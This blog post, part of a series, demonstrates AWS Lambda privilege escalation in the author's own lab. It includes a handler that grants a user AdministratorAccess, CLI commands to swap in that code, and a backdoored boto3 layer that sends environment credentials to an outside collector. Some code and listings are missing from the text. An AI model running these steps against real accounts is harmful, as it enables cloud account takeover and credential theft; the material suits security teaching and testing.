Welcome back! Today it will be all about AWS Lambda! Get yourself a cup of coffee or a nice glass of wine and join me looking into privilege escalation attacks leveraging AWS Lambda.

AWS Lambda

If you just jumped into my series I recommend starting at the beginning:

Let's get started!


I wrote a quick Lambda function (exploit_me) just displaying "Hello World" to make debugging easier and attached the privesc-high-priv-service-role to it to add some action. Furthermore I also created a lowpriv user with 0 privileges to demonstrate exploitation is successful.

def lambda_handler(event, context):
    print("Hello world")


The privesc17 policy only allows access to the following actions:


We are allowed to change the Lambda function code, let's use exploit_me. The following code will attach the AdministratorAccess policy to our lowpriv user. This works due to the high-privileged service role that is attached to the Lambda function.

import boto3
def lambda_handler(event, context):
    client = boto3.client('iam')
    response = client.attach_user_policy(UserName='lowpriv',PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess')
    return response

In order to replace the harmless "Hello World" code with our malicious exploit we have to create a ZIP file and upload the code:


aws lambda --profile privesc17 update-function-code --function-name exploit_me --zip-file fileb:// --region eu-central-1

In a real-world scenario we would need to wait until somebody invokes the Lambda function, in this case we just trigger it ourselves on by clicking on "Test".

Running aws iam --profile lowpriv list-users proves our lowpriv user has now full access to the AWS account.

Alright! That was pretty cool but what if we don't have lambda:UpdateFunctionCode but we have lambda:GetLayerVersion, lambda:PublishLayerVersion and lambda:UpdateFunctionConfiguration? Then we should infect the Lambda Layer! What are Lambda Layers? The guys from Rhino dive into this here:

Check out the AWS documentation:

Are you familiar with DLL hijacking and the Windows DLL search order? If so, the following won't surprise you. If you try to import a python library like boto3, Lambda will search the following locations until it finds it, starting from /var/task.


The Lambda runtime already includes boto3 on /var/runtime/boto3, but that's the 4th position. Using Lambda layers we can get in right before that, using /opt/python. ;-)

Executing the following commands will download the boto3 library that we'll infect:

mkdir python
cd python
pip3 install -t . boto3==1.9.42

Edit boto3/ to insert the following code that will exfiltrate the credentials:

        import os
        from botocore.vendored import requests'',data=dict(os.environ), timeout=1)

Using the following two AWS commands you'll publish the malicious layer version and attach it to the Lambda function.

aws lambda --profile privesc17 publish-layer-version --layer-name backdoor --description "Backdoor" --license-info "MIT" --zip-file "fileb://" --compatible-runtimes python3.7 python3.8 python3.9 --region eu-central-1

aws lambda --profile privesc17 update-function-configuration --function-name exploit_me --layers arn:aws:lambda:eu-central-1:account_number:layer:backdoor:1 --region eu-central-1

Now invoke the function again and you'll receive the AWS credentials on your Burp Collaborator instance. Take over the AWS account!

AWS credentials incoming!

Blog Logo

Robert Kugler

Information security and human rights enthusiast



Robert Kugler


Back to Overview